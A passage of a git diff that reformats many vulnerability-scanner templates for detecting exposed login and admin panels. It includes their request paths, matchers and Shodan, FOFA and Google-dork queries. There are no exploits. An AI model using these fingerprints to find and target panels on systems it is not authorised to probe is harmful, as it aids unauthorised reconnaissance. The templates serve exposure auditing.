cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"corebos" tags: panel,corebos diff --git a/http/exposed-panels/cortex-xsoar-login.yaml b/http/exposed-panels/cortex-xsoar-login.yaml index 4836ae7f51..0ecc3d67e9 100644 --- a/http/exposed-panels/cortex-xsoar-login.yaml +++ b/http/exposed-panels/cortex-xsoar-login.yaml @@ -7,7 +7,7 @@ info: description: Cortex XSOAR login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/couchdb-exposure.yaml b/http/exposed-panels/couchdb-exposure.yaml index f176e993d4..06cf8b42af 100644 --- a/http/exposed-panels/couchdb-exposure.yaml +++ b/http/exposed-panels/couchdb-exposure.yaml @@ -7,11 +7,11 @@ info: description: Apache CouchDB panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,couchdb metadata: max-request: 1 + tags: panel,couchdb http: - method: GET diff --git a/http/exposed-panels/couchdb-fauxton.yaml b/http/exposed-panels/couchdb-fauxton.yaml index 152261e601..e6ede78087 100644 --- a/http/exposed-panels/couchdb-fauxton.yaml +++ b/http/exposed-panels/couchdb-fauxton.yaml @@ -7,11 +7,11 @@ info: description: Apache CouchDB Fauxton panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,apache,couchdb metadata: max-request: 1 + tags: panel,apache,couchdb http: - method: GET diff --git a/http/exposed-panels/cpanel-api-codes.yaml b/http/exposed-panels/cpanel-api-codes.yaml index 9560f1ef4e..58460181b4 100644 --- a/http/exposed-panels/cpanel-api-codes.yaml +++ b/http/exposed-panels/cpanel-api-codes.yaml @@ -7,11 +7,11 @@ info: description: cPanel API Codes panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"CPanel - API Codes" tags: panel,cpanel @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "CPanel - API Codes" diff --git a/http/exposed-panels/craftcms-admin-panel.yaml b/http/exposed-panels/craftcms-admin-panel.yaml index e0ec247f55..7a4daaafd3 100644 --- a/http/exposed-panels/craftcms-admin-panel.yaml +++ b/http/exposed-panels/craftcms-admin-panel.yaml @@ -7,7 +7,7 @@ info: description: Craft CMS admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/creatio-login-panel.yaml b/http/exposed-panels/creatio-login-panel.yaml index 41df6d56b3..63ed3a1dda 100644 --- a/http/exposed-panels/creatio-login-panel.yaml +++ b/http/exposed-panels/creatio-login-panel.yaml @@ -7,11 +7,11 @@ info: description: Creatio login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Creatio" tags: panel,creatio diff --git a/http/exposed-panels/crontab-ui.yaml b/http/exposed-panels/crontab-ui.yaml index 2c015deb13..8a53f9044b 100644 --- a/http/exposed-panels/crontab-ui.yaml +++ b/http/exposed-panels/crontab-ui.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=629288492575007&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Crontab UI" tags: exposure,crontab,ui,panel @@ -26,4 +26,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/crush-ftp-login.yaml b/http/exposed-panels/crush-ftp-login.yaml index 8cbaa3a944..ad51cfff84 100644 --- a/http/exposed-panels/crush-ftp-login.yaml +++ b/http/exposed-panels/crush-ftp-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6591 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'CrushFTP WebInterface' + - type: status status: - 200 diff --git a/http/exposed-panels/crxde-lite.yaml b/http/exposed-panels/crxde-lite.yaml index 7ac010fb81..f73b951ac3 100644 --- a/http/exposed-panels/crxde-lite.yaml +++ b/http/exposed-panels/crxde-lite.yaml @@ -7,16 +7,17 @@ info: description: CRXDE Lite panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET path: - "{{BaseURL}}/crx/de/index.jsp" + matchers: - type: word words: diff --git a/http/exposed-panels/cryptobox-panel.yaml b/http/exposed-panels/cryptobox-panel.yaml index bc7382acaa..4a9dc511ef 100644 --- a/http/exposed-panels/cryptobox-panel.yaml +++ b/http/exposed-panels/cryptobox-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ercom.com/solutions/cryptobox-presentation metadata: + verified: true max-request: 1 shodan-query: title:"Cryptobox" - verified: true tags: panel,cryptobox,login,detect http: @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/csod-panel.yaml b/http/exposed-panels/csod-panel.yaml index f7f66f36f8..56abc24a89 100644 --- a/http/exposed-panels/csod-panel.yaml +++ b/http/exposed-panels/csod-panel.yaml @@ -7,16 +7,17 @@ info: description: Cornerstone OnDemand panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,csod metadata: max-request: 1 + tags: panel,csod http: - method: GET path: - "{{BaseURL}}" + host-redirects: true max-redirects: 5 matchers: diff --git a/http/exposed-panels/cudatel-panel.yaml b/http/exposed-panels/cudatel-panel.yaml index e4076aed09..8735418098 100644 --- a/http/exposed-panels/cudatel-panel.yaml +++ b/http/exposed-panels/cudatel-panel.yaml @@ -7,11 +7,11 @@ info: description: CudaTel login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"CudaTel" tags: panel,cudatel diff --git a/http/exposed-panels/cvent-panel-detect.yaml b/http/exposed-panels/cvent-panel-detect.yaml index 9c46690ab1..c09f44be2d 100644 --- a/http/exposed-panels/cvent-panel-detect.yaml +++ b/http/exposed-panels/cvent-panel-detect.yaml @@ -7,11 +7,11 @@ info: description: Cvent login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 5 verified: true + max-request: 5 shodan-query: http.html:"Cvent Inc" tags: panel,cvent diff --git a/http/exposed-panels/cwp-webpanel.yaml b/http/exposed-panels/cwp-webpanel.yaml index a5c75ce618..0ac8ad49d0 100644 --- a/http/exposed-panels/cwp-webpanel.yaml +++ b/http/exposed-panels/cwp-webpanel.yaml @@ -7,7 +7,7 @@ info: description: Control Web Panel login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/cx-cloud-login.yaml b/http/exposed-panels/cx-cloud-login.yaml index 6ed5dc14ad..1c2e107562 100644 --- a/http/exposed-panels/cx-cloud-login.yaml +++ b/http/exposed-panels/cx-cloud-login.yaml @@ -7,11 +7,11 @@ info: description: CX Cloud panel was detected, classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,cx metadata: max-request: 2 + tags: panel,cx http: - method: GET diff --git a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml index c6d4491166..9db297b7c8 100644 --- a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml +++ b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml @@ -5,16 +5,16 @@ info: author: idealphase severity: info description: Cyberoam SSL VPN panel was detected. + reference: + - https://docs.sophos.com/nsg/Cyberoam/Version%2010.x/10.6.3/Guides/Cyberoam%20SSL%20VPN%20User%20Guide.pdf classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 shodan-query: title:"Cyberoam SSL VPN Portal" google-query: intitle:"Cyberoam SSL VPN Portal" - reference: - - https://docs.sophos.com/nsg/Cyberoam/Version%2010.x/10.6.3/Guides/Cyberoam%20SSL%20VPN%20User%20Guide.pdf tags: panel,cyberoam,vpn http: diff --git a/http/exposed-panels/d-link-wireless.yaml b/http/exposed-panels/d-link-wireless.yaml index d4e9656330..fe652cc5a2 100644 --- a/http/exposed-panels/d-link-wireless.yaml +++ b/http/exposed-panels/d-link-wireless.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6784 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: dlink,router,edb,panel metadata: max-request: 1 + tags: dlink,router,edb,panel http: - method: GET @@ -26,6 +26,7 @@ http: words: - 'D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME' - 'D-LINK SYSTEMS, INC. | WIRELESS ACCESS POINT | HOME' + - type: status status: - 200 diff --git a/http/exposed-panels/darktrace-threat-visualizer.yaml b/http/exposed-panels/darktrace-threat-visualizer.yaml index 3cafa1c471..d29816d6ff 100644 --- a/http/exposed-panels/darktrace-threat-visualizer.yaml +++ b/http/exposed-panels/darktrace-threat-visualizer.yaml @@ -7,11 +7,11 @@ info: description: Darktrace Threat Visualizer login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Darktrace Threat Visualizer" tags: panel,darktrace diff --git a/http/exposed-panels/dashy-panel.yaml b/http/exposed-panels/dashy-panel.yaml index b894857a6a..c9657a8bb8 100644 --- a/http/exposed-panels/dashy-panel.yaml +++ b/http/exposed-panels/dashy-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://dashy.to/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1013024216 tags: panel,dashy,detect diff --git a/http/exposed-panels/datadog-login.yaml b/http/exposed-panels/datadog-login.yaml index 0b9601a88d..4dbeef4dcd 100644 --- a/http/exposed-panels/datadog-login.yaml +++ b/http/exposed-panels/datadog-login.yaml @@ -7,11 +7,11 @@ info: description: Datadog login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Datadog" tags: panel,datadog diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index a87b36f5ab..c8a852e38d 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -7,11 +7,11 @@ info: description: Dataiku panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"dataiku" tags: panel,dataiku diff --git a/http/exposed-panels/davantis-panel.yaml b/http/exposed-panels/davantis-panel.yaml index db0b6662fb..f364f482c8 100644 --- a/http/exposed-panels/davantis-panel.yaml +++ b/http/exposed-panels/davantis-panel.yaml @@ -7,11 +7,11 @@ info: description: Davantis Video Analytics panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Davantis" tags: panel,davantis diff --git a/http/exposed-panels/daybyday-panel.yaml b/http/exposed-panels/daybyday-panel.yaml index ba315af937..b4b5782671 100644 --- a/http/exposed-panels/daybyday-panel.yaml +++ b/http/exposed-panels/daybyday-panel.yaml @@ -7,7 +7,7 @@ info: description: DaybydayCRM login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,7 +21,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/defectdojo-panel.yaml b/http/exposed-panels/defectdojo-panel.yaml index a3e3190bc5..1f8c7a6baa 100644 --- a/http/exposed-panels/defectdojo-panel.yaml +++ b/http/exposed-panels/defectdojo-panel.yaml @@ -7,7 +7,7 @@ info: description: DefectDojo login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/dell-bmc-panel-detect.yaml b/http/exposed-panels/dell-bmc-panel-detect.yaml index 4874741914..12b343474c 100644 --- a/http/exposed-panels/dell-bmc-panel-detect.yaml +++ b/http/exposed-panels/dell-bmc-panel-detect.yaml @@ -8,12 +8,12 @@ info: Dell BMC web panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Dell Remote Management Controller" - verified: true tags: panel,bmc,dell,login http: diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index 15fb1b5481..620caf2206 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"thisIDRACText" - verified: true tags: panel,idrac,dell,detect http: @@ -21,6 +21,7 @@ http: - '{{BaseURL}}/login.html' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/dell-openmanager-login.yaml b/http/exposed-panels/dell-openmanager-login.yaml index c592c8f365..c116774b9d 100644 --- a/http/exposed-panels/dell-openmanager-login.yaml +++ b/http/exposed-panels/dell-openmanager-login.yaml @@ -7,7 +7,7 @@ info: description: Dell OpenManage Switch Administrator login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 diff --git a/http/exposed-panels/dell-wyse-login.yaml b/http/exposed-panels/dell-wyse-login.yaml index 09a3d47369..7ec927541f 100644 --- a/http/exposed-panels/dell-wyse-login.yaml +++ b/http/exposed-panels/dell-wyse-login.yaml @@ -9,11 +9,11 @@ info: - https://research.nccgroup.com/2021/07/06/technical-advisory-arbitrary-file-read-in-dell-wyse-management-suite-cve-2021-21586-cve-2021-21587/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,dell,login metadata: max-request: 1 + tags: panel,dell,login http: - method: GET diff --git a/http/exposed-panels/delta-login-panel.yaml b/http/exposed-panels/delta-login-panel.yaml index 5e02485d76..75450e1cfc 100644 --- a/http/exposed-panels/delta-login-panel.yaml +++ b/http/exposed-panels/delta-login-panel.yaml @@ -7,7 +7,7 @@ info: description: Delta Controls admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index bd2d13801c..fe2d124958 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -7,11 +7,11 @@ info: description: Deluge WebUI login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Deluge WebUI" tags: panel,deluge diff --git a/http/exposed-panels/dericam-login.yaml b/http/exposed-panels/dericam-login.yaml index 13e6115bae..36348ff561 100644 --- a/http/exposed-panels/dericam-login.yaml +++ b/http/exposed-panels/dericam-login.yaml @@ -5,12 +5,12 @@ info: author: dhiyaneshDk severity: info description: Dericam login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/7354 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 shodan-query: http.title:"Dericam" diff --git a/http/exposed-panels/digitalrebar-login.yaml b/http/exposed-panels/digitalrebar-login.yaml index e174ef9c31..71d3163368 100644 --- a/http/exposed-panels/digitalrebar-login.yaml +++ b/http/exposed-panels/digitalrebar-login.yaml @@ -10,11 +10,11 @@ info: - https://docs.rackn.io/en/latest/doc/server.html#ports classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: rackn,digitalrebar,panel metadata: max-request: 2 + tags: rackn,digitalrebar,panel http: - method: GET @@ -25,6 +25,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: status diff --git a/http/exposed-panels/directadmin-login-panel.yaml b/http/exposed-panels/directadmin-login-panel.yaml index 6db05cf9f5..2a3afd6403 100644 --- a/http/exposed-panels/directadmin-login-panel.yaml +++ b/http/exposed-panels/directadmin-login-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.directadmin.com/whats_new.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/directum-login.yaml b/http/exposed-panels/directum-login.yaml index 27d902e16d..7d63462989 100644 --- a/http/exposed-panels/directum-login.yaml +++ b/http/exposed-panels/directum-login.yaml @@ -7,7 +7,7 @@ info: description: Directum login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml index a8fe16d47f..59c6b9e2a1 100644 --- a/http/exposed-panels/discuz-panel.yaml +++ b/http/exposed-panels/discuz-panel.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Discuz!" fofa-query: title="Discuz!" tags: panel,discuz,detect,login @@ -17,6 +17,7 @@ http: - '{{BaseURL}}' host-redirects: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/django-admin-panel.yaml b/http/exposed-panels/django-admin-panel.yaml index ae764b7e12..c73295ee32 100644 --- a/http/exposed-panels/django-admin-panel.yaml +++ b/http/exposed-panels/django-admin-panel.yaml @@ -7,16 +7,17 @@ info: description: Python Django admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,django,python metadata: max-request: 1 + tags: panel,django,python http: - method: GET path: - "{{BaseURL}}/admin/login/?next=/admin/" + matchers: - type: word words: diff --git a/http/exposed-panels/docebo-elearning-panel.yaml b/http/exposed-panels/docebo-elearning-panel.yaml index 84b49fb7f6..58564c2a4e 100644 --- a/http/exposed-panels/docebo-elearning-panel.yaml +++ b/http/exposed-panels/docebo-elearning-panel.yaml @@ -7,11 +7,11 @@ info: description: Docebo eLearning login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="Docebo E-learning" tags: panel,docebo diff --git a/http/exposed-panels/dolibarr-panel.yaml b/http/exposed-panels/dolibarr-panel.yaml index f4cc56315b..a6d65084d1 100644 --- a/http/exposed-panels/dolibarr-panel.yaml +++ b/http/exposed-panels/dolibarr-panel.yaml @@ -7,7 +7,7 @@ info: description: Dolibarr login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/dotclear-panel.yaml b/http/exposed-panels/dotclear-panel.yaml index 6dac9cf591..6f4cce1214 100644 --- a/http/exposed-panels/dotclear-panel.yaml +++ b/http/exposed-panels/dotclear-panel.yaml @@ -7,7 +7,7 @@ info: description: Dotclear admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 diff --git a/http/exposed-panels/dotcms-admin-panel.yaml b/http/exposed-panels/dotcms-admin-panel.yaml index 7867d069f1..0b87741da9 100644 --- a/http/exposed-panels/dotcms-admin-panel.yaml +++ b/http/exposed-panels/dotcms-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: dotAdmin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,dotcms,cms metadata: max-request: 1 + tags: panel,dotcms,cms http: - method: GET diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 1a788c5f9a..02445963c1 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -7,11 +7,11 @@ info: description: DPLUS Dashboard panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"DPLUS Dashboard" tags: panel,dplus,exposure diff --git a/http/exposed-panels/dqs-superadmin-panel.yaml b/http/exposed-panels/dqs-superadmin-panel.yaml index 4a7ca442ff..6d1968026b 100644 --- a/http/exposed-panels/dqs-superadmin-panel.yaml +++ b/http/exposed-panels/dqs-superadmin-panel.yaml @@ -7,11 +7,11 @@ info: description: DQS Superadmin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"DQS Superadmin" tags: panel,dqs,superadmin diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index f35ec3f756..ad5dcb457c 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -9,11 +9,11 @@ info: - https://dradisframework.com/ce/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Dradis Professional Edition" tags: panel,dradis diff --git a/http/exposed-panels/drawio-flowchartmaker-panel.yaml b/http/exposed-panels/drawio-flowchartmaker-panel.yaml index dd222be274..2cc6ac8145 100644 --- a/http/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/http/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/jgraph/drawio classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Flowchart Maker" tags: panel,drawio,oss @@ -24,7 +24,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/drone-ci-panel.yaml b/http/exposed-panels/drone-ci-panel.yaml index f29cdb7a67..4c8f58e682 100644 --- a/http/exposed-panels/drone-ci-panel.yaml +++ b/http/exposed-panels/drone-ci-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.drone.io classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/druid-console-exposure.yaml b/http/exposed-panels/druid-console-exposure.yaml index e4bb08ce77..77d12e8821 100644 --- a/http/exposed-panels/druid-console-exposure.yaml +++ b/http/exposed-panels/druid-console-exposure.yaml @@ -7,11 +7,11 @@ info: description: Alibaba Druid panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,alibaba,druid metadata: max-request: 1 + tags: panel,alibaba,druid http: - method: GET diff --git a/http/exposed-panels/druid-panel.yaml b/http/exposed-panels/druid-panel.yaml index 1949f146d6..4b0b46e3eb 100644 --- a/http/exposed-panels/druid-panel.yaml +++ b/http/exposed-panels/druid-panel.yaml @@ -7,11 +7,11 @@ info: description: Druid Monitor login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,druid metadata: max-request: 1 + tags: panel,druid http: - method: GET diff --git a/http/exposed-panels/drupal-login.yaml b/http/exposed-panels/drupal-login.yaml index 71785d2b65..57b69c4c40 100644 --- a/http/exposed-panels/drupal-login.yaml +++ b/http/exposed-panels/drupal-login.yaml @@ -7,7 +7,7 @@ info: description: Drupal login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/user/login" stop-at-first-match: true + matchers-condition: or matchers: - type: regex diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index ffb47bcce4..419e993850 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.dedalus.com/fr/wp-content/uploads/sites/13/2022/05/Catalogue-formations-DxCare-2022.pdf metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,dxplanning,login,detect http: diff --git a/http/exposed-panels/dynamicweb-panel.yaml b/http/exposed-panels/dynamicweb-panel.yaml index 1cf5d98969..ae966821fe 100644 --- a/http/exposed-panels/dynamicweb-panel.yaml +++ b/http/exposed-panels/dynamicweb-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.dynamicweb.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/dynatrace-panel.yaml b/http/exposed-panels/dynatrace-panel.yaml index 31cf72f851..259b6186f2 100644 --- a/http/exposed-panels/dynatrace-panel.yaml +++ 